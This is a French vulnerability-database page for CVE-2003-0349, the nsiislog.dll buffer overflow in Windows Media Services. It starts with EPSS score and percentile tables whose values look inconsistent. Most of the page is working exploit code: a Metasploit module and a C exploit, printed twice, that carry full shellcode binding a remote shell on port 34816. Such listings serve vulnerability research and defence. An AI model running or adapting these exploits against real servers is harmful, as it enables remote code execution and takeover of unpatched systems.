CVE-2003-0349 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	85.53%	–	–
2023-03-12	–	–	–	96.44%	–
2023-07-16	–	–	–	96.19%	–
2023-12-10	–	–	–	96.47%	–
2024-02-11	–	–	–	96.47%	–
2024-06-02	–	–	–	96.16%	–
2024-11-10	–	–	–	92.89%	–
2024-12-22	–	–	–	92.67%	–
2025-01-19	–	–	–	92.67%	–
2025-03-18	–	–	–	–	88.21%
2025-03-18	–	–	–	–	88.21,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	99%
2023-07-16	99%
2023-12-10	99%
2024-02-11	1%
2024-06-02	1%
2024-11-10	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-18	99%

## # $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::BruteTargets include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', 'Description' => %q{ This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0349'], [ 'OSVDB', '4535'], [ 'BID', '8035'], [ 'MSB', 'MS03-022'], [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # SEH offsets by version (Windows 2000) # 4.1.0.3917 = 9992 # 4.1.0.3920 = 9992 # 4.1.0.3927 = 9992 # 4.1.0.3931 = 14092 ['Brute Force', { }], ['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], ['Windows XP -MS03-019', { 'Rets' => [ 9992, 0x40f011e0 ] }], ], 'DisclosureDate' => 'Jun 25 2003', 'DefaultTarget' => 0)) register_options( [ OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), ], self.class) end def check res = send_request_raw({ 'uri' => datastore['URL'] }, -1) if (res and res.body =~ /NetShow ISAPI/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit_target(target) # Create a buffer greater than max SEH offset (16384) pst = rand_text_alphanumeric(256) * 64 # Create SEH frame and insert into buffer seh = generate_seh_payload(target['Rets'][1]) pst[target['Rets'][0], seh.length] = seh # Send it to the server print_status("Sending request...") res = send_request_cgi({ 'uri' => datastore['URL'], 'method' => 'POST', 'user-agent' => 'NSPlayer/2.0', 'content-type' => 'application/x-www-form-urlencoded', 'data' => pst }, 5) select(nil,nil,nil,1) handler disconnect end end

// Windows Media Services Remote Command Execution #2 // v. 1.0 beta // (c) firew0rker //tN [The N0b0D1eS] #include <stdio.h> #include <string.h> #include <stdlib.h> #ifdef WIN32 #include <winsock.h> #pragma comment(lib, "wsock32") #else #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #define SOCKET int #define DWORD uint32_t #define ULONG unsigned long #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define closesocket close #endif char shellcode[]= //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï ®â« ¤ª¨ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff" "\xff\x5b\x81\xeb\x4d\x43\x22\x11" "\x8b\xc3\x05\x66\x43\x22\x11\x66" "\xb9\x15\x03\x80\x30\xfb\x40\x67" "\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" "\x53\x06\x04\x04\x76\x66\x37\x06" "\x04\x04\xa8\x40\xf6\xbd\xd9\xea" "\xf8\x66\x53\x06\x04\x04\xa8\x93" "\xfb\xfb\x04\x04\x13\x91\xfa\xfb" "\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" "\x53\x06\x04\x04\xab\x04\x6e\x37" "\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" "\xfa\xfb\xfb\x76\x66\x3b\x06\x04" "\x04\xa8\x40\xba\xbd\xd9\xea\xf8" "\x66\x53\x06\x04\x04\xa8\xab\x13" "\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" "\x04\x04\xab\x93\xfa\xfa\xfb\xfb" "\x04\x6e\x4b\x06\x04\x04\xc8\x20" "\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" "\xf9\x04\x6e\x3b\x06\x04\x04\x72" "\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" "\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" "\x7e\x9d\x05\x04\x04\x73\xfb\x3c" "\x7e\x93\x05\x04\x04\xfb\xfb\xfb" "\xfb\x76\x66\x9f\x05\x04\x04\x91" "\xeb\xa8\x04\x4e\xa7\x05\x04\x04" "\x04\x6e\x47\x06\x04\x04\xf0\x3b" "\x8f\xe8\x76\x6e\x9c\x05\x04\x04" "\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" "\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" "\x4e\xa7\x05\x04\x04\x04\x6e\x43" "\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" "\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" "\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" "\x05\x04\x04\xab\x76\x7e\x9f\x05" "\x04\x04\xab\x04\x4e\xa7\x05\x04" "\x04\x04\x6e\x4f\x06\x04\x04\x72" "\x7e\xa3\x05\x04\x04\x07\x76\x46" "\xf3\x05\x04\x04\xc8\x3b\x42\xbf" "\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" "\x05\x04\x04\xfb\xfa\xfb\xfb\x70" "\x7e\xa3\x05\x04\x04\x72\x7e\xbf" "\x05\x04\x04\x72\x7e\xb3\x05\x04" "\x04\x72\x7e\xbb\x05\x04\x04\x3c" "\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" "\xfb\xc8\x20\x76\x7e\x03\x06\x04" "\x04\xab\x76\x7e\xf3\x05\x04\x04" "\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" "\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" "\xea\xf8\x7e\x53\x06\x04\x04\xab" "\xa8\x04\x6e\x3f\x06\x04\x04\x04" "\x4e\xa3\x05\x04\x04\x04\x6e\x57" "\x06\x04\x04\x12\xa0\x04\x04\x04" "\x04\x6e\x33\x06\x04\x04\x13\x76" "\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" "\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" "\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" "\xd9\xea\xf8\xff\xdf\x78\x3f\xff" "\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" "\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" "\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" "\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" "\xff\x72\xbe\x07\x9f\x9c\x72\xdd" "\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" "\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" "\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" "\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" "\xfb\x10\x19\x72\x86\x0b\x72\x8e" "\x17\x70\x86\xf7\x42\x6d\xfb\xfb" "\xfb\xc9\x3b\x09\x55\x72\x86\x0f" "\x70\x34\xd0\xb6\xf7\x70\xad\x83" "\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" "\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" "\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" "\x78\x3f\xff\x10\xf1\xa2\x78\x38" "\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" "\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" "\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" "\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" "\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" "\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" "\xf7\x70\xa6\xeb\x72\xf8\x78\x96" "\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" "\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" "\x78\x3f\xff\xa5\xa4\x32\x39\xf7" "\xfb\x70\x86\x0b\x12\x99\x04\x04" "\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" "\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" "\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" "\x38\xb7\x94\x9a\x9f\xb7\x92\x99" "\x89\x9a\x89\x82\xba\xfb\xbe\x83" "\x92\x8f\xab\x89\x94\x98\x9e\x88" "\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" "\xab\x89\x94\x98\x9e\x88\x88\xba" "\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" "\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" "\xa8\x94\x98\x90\x9e\x8f\xba\xfb" "\x99\x92\x95\x9f\xfb\x97\x92\x88" "\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" "\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" "\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" "\x94\x88\x9e\x88\x94\x98\x90\x9e" "\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" "\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãä¥à¥ (sploit) const DWORD default_EBX_points_to = 9988; //㪠§ â¥«ì ¢ EBX ®â­®á¨â¥«ì­® sploit //const DWORD default_EIP_value = 0x77F8441B; //¯® í⮬㠤à. ¤.¡. JMP EDX, ¢ ¤ ­­®¬ á«ãç ¥ íâ® ¢ ntdll.dll const DWORD default_EIP_value = 0x40F01333; //const default_EDX_points_to = 0x1000; //íâ® ­¥ ¯à¨£®¤¨«®áì char *nsiislog_default = "/scripts/nsiislog.dll"; char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; char sploitbuf[sizeof(sploit)*2]; void usage(char* argv[]) { printf("Dicklamer (: " "We are not responsible for the illegal use of this software.\n" "Description: Binds shell to port 34816 (or higher if port busy).\n" "Usage: " "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" "Supported target(s):\n" "Windows version\t\t\t\tnsiislog.dll version\n" "------------------------------------------------------------\n" "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); exit(0); } int main(int argc, char* argv[]) { #ifdef WIN32 WSADATA wsaData; #endif int target_port = 80; char *nsiislog = nsiislog_default; int nArgIndex; if (argc<2) usage(argv); nArgIndex = 1; while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) { switch (argv[nArgIndex++][1]) { case 'p': case 'P': target_port = atoi(argv[nArgIndex++]); continue; case 'r': case 'R': nsiislog = argv[nArgIndex++]; continue; default: usage(argv); } } try { #ifdef WIN32 WSAStartup(0x0101, &wsaData); #endif SOCKET s = socket(AF_INET,SOCK_STREAM,0); if (s == INVALID_SOCKET) throw("No socket"); sockaddr_in addr; //Ž¯à¥¤¥«ï¥¬ ¤à¥á á¥à¢ ª ULONG iaddr = inet_addr(argv[1]); if (iaddr == INADDR_NONE) {//€¤à¥á - ¨¬ï á¥à¢ ª hostent *ph = gethostbyname(argv[1]); if (!ph) throw("Cant resolve hostname"); memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); } else {//€¤à¥á - IP memcpy(&addr.sin_addr.s_addr,&iaddr,4); }; addr.sin_family = AF_INET; addr.sin_port = htons(target_port); int sizeofaddr=sizeof(addr); char *req = "MX_STATS_LogLine: "; strcpy(sploit, req); memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/); memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã¡à âì \0*/); //¯à¨ ¯¥à¥å®¤¥ ­ EIP, EBX ¡ã¤¥â 㪠§ë¢ âì ­ ¯®á«¥¤­¨© DWORD ­ 襣® § ¯à®á , £¤¥ JZ/JNZ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ sploit[sizeof(sploit)-1] = 0; if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); sprintf(sploitbuf, "POST %s HTTP/1.0\r\n" "Accept: */*\r\n" "User-Agent: NSPlayer/4.1.0.3917\r\n" "Content-Type: text/plain\r\n" "Content-Length: %i\r\n" "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" "\r\n%s\r\n", nsiislog,strlen(sploit),sploit); int snd=send(s,sploitbuf,strlen(sploitbuf),0); if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); else throw("Cant send exploit"); closesocket(s); } catch (char *errmsg) { printf("%s\n",errmsg); return -1; } catch (int err_n) { printf("error %i\n",err_n); return err_n; } #ifdef WIN32 WSACleanup(); #endif return 0; } // milw0rm.com [2003-07-01]

// source: https://www.securityfocus.com/bid/8035/info Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services. // Windows Media Services Remote Command Execution #2 // v. 1.0 beta // (c) firew0rker //tN [The N0b0D1eS] #include <stdio.h> #include <string.h> #include <stdlib.h> #ifdef WIN32 #include <winsock.h> #pragma comment(lib, "wsock32") #else #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #define SOCKET int #define DWORD uint32_t #define ULONG unsigned long #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define closesocket close #endif char shellcode[]= //"\x90\x90\x90\x90\x90\x90\x90\xCC" //¤«ï⤪¨ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff" "\xff\x5b\x81\xeb\x4d\x43\x22\x11" "\x8b\xc3\x05\x66\x43\x22\x11\x66" "\xb9\x15\x03\x80\x30\xfb\x40\x67" "\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" "\x53\x06\x04\x04\x76\x66\x37\x06" "\x04\x04\xa8\x40\xf6\xbd\xd9\xea" "\xf8\x66\x53\x06\x04\x04\xa8\x93" "\xfb\xfb\x04\x04\x13\x91\xfa\xfb" "\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" "\x53\x06\x04\x04\xab\x04\x6e\x37" "\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" "\xfa\xfb\xfb\x76\x66\x3b\x06\x04" "\x04\xa8\x40\xba\xbd\xd9\xea\xf8" "\x66\x53\x06\x04\x04\xa8\xab\x13" "\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" "\x04\x04\xab\x93\xfa\xfa\xfb\xfb" "\x04\x6e\x4b\x06\x04\x04\xc8\x20" "\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" "\xf9\x04\x6e\x3b\x06\x04\x04\x72" "\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" "\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" "\x7e\x9d\x05\x04\x04\x73\xfb\x3c" "\x7e\x93\x05\x04\x04\xfb\xfb\xfb" "\xfb\x76\x66\x9f\x05\x04\x04\x91" "\xeb\xa8\x04\x4e\xa7\x05\x04\x04" "\x04\x6e\x47\x06\x04\x04\xf0\x3b" "\x8f\xe8\x76\x6e\x9c\x05\x04\x04" "\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" "\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" "\x4e\xa7\x05\x04\x04\x04\x6e\x43" "\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" "\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" "\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" "\x05\x04\x04\xab\x76\x7e\x9f\x05" "\x04\x04\xab\x04\x4e\xa7\x05\x04" "\x04\x04\x6e\x4f\x06\x04\x04\x72" "\x7e\xa3\x05\x04\x04\x07\x76\x46" "\xf3\x05\x04\x04\xc8\x3b\x42\xbf" "\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" "\x05\x04\x04\xfb\xfa\xfb\xfb\x70" "\x7e\xa3\x05\x04\x04\x72\x7e\xbf" "\x05\x04\x04\x72\x7e\xb3\x05\x04" "\x04\x72\x7e\xbb\x05\x04\x04\x3c" "\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" "\xfb\xc8\x20\x76\x7e\x03\x06\x04" "\x04\xab\x76\x7e\xf3\x05\x04\x04" "\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" "\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" "\xea\xf8\x7e\x53\x06\x04\x04\xab" "\xa8\x04\x6e\x3f\x06\x04\x04\x04" "\x4e\xa3\x05\x04\x04\x04\x6e\x57" "\x06\x04\x04\x12\xa0\x04\x04\x04" "\x04\x6e\x33\x06\x04\x04\x13\x76" "\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" "\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" "\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" "\xd9\xea\xf8\xff\xdf\x78\x3f\xff" "\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" "\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" "\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" "\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" "\xff\x72\xbe\x07\x9f\x9c\x72\xdd" "\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" "\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" "\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" "\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" "\xfb\x10\x19\x72\x86\x0b\x72\x8e" "\x17\x70\x86\xf7\x42\x6d\xfb\xfb" "\xfb\xc9\x3b\x09\x55\x72\x86\x0f" "\x70\x34\xd0\xb6\xf7\x70\xad\x83" "\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" "\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" "\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" "\x78\x3f\xff\x10\xf1\xa2\x78\x38" "\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" "\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" "\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" "\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" "\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" "\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" "\xf7\x70\xa6\xeb\x72\xf8\x78\x96" "\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" "\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" "\x78\x3f\xff\xa5\xa4\x32\x39\xf7" "\xfb\x70\x86\x0b\x12\x99\x04\x04" "\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" "\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" "\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" "\x38\xb7\x94\x9a\x9f\xb7\x92\x99" "\x89\x9a\x89\x82\xba\xfb\xbe\x83" "\x92\x8f\xab\x89\x94\x98\x9e\x88" "\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" "\xab\x89\x94\x98\x9e\x88\x88\xba" "\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" "\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" "\xa8\x94\x98\x90\x9e\x8f\xba\xfb" "\x99\x92\x95\x9f\xfb\x97\x92\x88" "\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" "\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" "\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" "\x94\x88\x9e\x88\x94\x98\x90\x9e" "\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" "\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; const DWORD default_EIP_pos = 9992; //¯®«®¦¥­¨¥ EIP ¢ ¡ãà(sploit) const DWORD default_EBX_points_to = 9988; //㧠⥫ì EBX ®⭮ᥫ쭮 sploit //const DWORD default_EIP_value = 0x77F8441B; //¯® í¬ã¤à¤.¡. JMP EDX, ¢ ¤ ­­®¬ áç í ¢ ntdll.dll const DWORD default_EIP_value = 0x40F01333; //const default_EDX_points_to = 0x1000; //í ­¥ ¯ਣ®¤¨«®á char *nsiislog_default = "/scripts/nsiislog.dll"; char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; char sploitbuf[sizeof(sploit)*2]; void usage(char* argv[]) { printf("Dicklamer (: " "We are not responsible for the illegal use of this software.\n" "Description: Binds shell to port 34816 (or higher if port busy).\n" "Usage: " "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" "Supported target(s):\n" "Windows version\t\t\t\tnsiislog.dll version\n" "------------------------------------------------------------\n" "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); exit(0); } int main(int argc, char* argv[]) { #ifdef WIN32 WSADATA wsaData; #endif int target_port = 80; char *nsiislog = nsiislog_default; int nArgIndex; if (argc<2) usage(argv); nArgIndex = 1; while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) { switch (argv[nArgIndex++][1]) { case 'p': case 'P': target_port = atoi(argv[nArgIndex++]); continue; case 'r': case 'R': nsiislog = argv[nArgIndex++]; continue; default: usage(argv); } } try { #ifdef WIN32 WSAStartup(0x0101, &wsaData); #endif SOCKET s = socket(AF_INET,SOCK_STREAM,0); if (s == INVALID_SOCKET) throw("No socket"); sockaddr_in addr; //.¯।¥«塞 ¤à ᢠª ULONG iaddr = inet_addr(argv[1]); if (iaddr == INADDR_NONE) {//.¤à - ¨¬ï¥àª hostent *ph = gethostbyname(argv[1]); if (!ph) throw("Cant resolve hostname"); memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); } else {//.¤à - IP memcpy(&addr.sin_addr.s_addr,&iaddr,4); }; addr.sin_family = AF_INET; addr.sin_port = htons(target_port); int sizeofaddr=sizeof(addr); char *req = "MX_STATS_LogLine: "; strcpy(sploit, req); memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); //memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/*ã â\0*/); memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/*ã â\0*/); //¯à¯¥à®¤¥ ­ EIP, EBX ¡㤥⪠§ëâ­ ¯®᫥¤­¨© DWORD ­ 襣® § ¯à , £¤¥ JZ/JNZ memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ sploit[sizeof(sploit)-1] = 0; if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); sprintf(sploitbuf, "POST %s HTTP/1.0\r\n" "Accept: */*\r\n" "User-Agent: NSPlayer/4.1.0.3917\r\n" "Content-Type: text/plain\r\n" "Content-Length: %i\r\n" "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" "\r\n%s\r\n", nsiislog,strlen(sploit),sploit); int snd=send(s,sploitbuf,strlen(sploitbuf),0); if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); else throw("Cant send exploit"); closesocket(s); } catch (char *errmsg) { printf("%s\n",errmsg); return -1; } catch (int err_n) { printf("error %i\n",err_n); return err_n; } #ifdef WIN32 WSACleanup(); #endif return 0; }